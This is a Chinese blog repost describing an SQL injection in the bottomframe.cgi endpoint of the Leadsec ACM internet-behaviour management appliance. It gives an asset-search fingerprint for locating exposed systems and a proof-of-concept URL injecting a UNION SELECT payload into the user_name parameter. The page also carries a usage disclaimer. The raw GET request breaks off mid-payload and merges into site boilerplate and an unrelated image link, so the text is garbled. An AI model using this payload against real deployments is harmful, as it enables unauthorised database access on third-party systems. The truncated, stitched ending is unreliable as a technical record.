本文主要是介绍【漏洞复现】网御ACM上网行为管理系统bottomframe.cgi接口存在SQL注入漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞描述
网御上网行为管理系统(简称Leadsec ACM)是网御为互联网接入用户在信息内容安全、网络应用管理、组织运营效率、网络资源利用、法律风险规避及网络投资回报等方面提供的全方位解决方案。网御上网行为管理系统存在SQL注入漏洞。
网御 ACM上网行为管理系统 bottomframe.cgi接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限进行敏感操作
免责声明
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!
资产确定
app=“网御星云-上网行为管理系统”
漏洞复现
漏洞链接:https://127.0.0.1/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5这篇关于【漏洞复现】网御ACM上网行为管理系统bottomframe.cgi接口存在SQL注入漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![[MySQL表的增删改查-进阶]](https://i-blog.csdnimg.cn/direct/626d73342e0c406894e1017eafd30cf2.png)
